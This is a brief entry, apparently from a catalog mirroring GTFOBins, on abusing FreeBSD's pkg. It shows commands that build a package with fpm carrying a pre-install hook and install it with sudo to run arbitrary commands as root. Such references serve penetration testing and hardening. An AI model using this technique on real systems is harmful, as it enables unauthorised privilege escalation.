Catalog GTFOBins

GTFO · Tool

pkg

1 technique LinuxGTFOBins GPL-3.0

command

ExecutionPrivilege Escalation Linux

Generate the FreeBSD package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target. ``` echo /path/to/command >x.sh fpm -n x -s dir -t freebsd -a all --before-install x.sh . ```

pkg install -y --no-repo-update ./x-1.0.txz
Context
sudo
Native
command
MITRE
T1059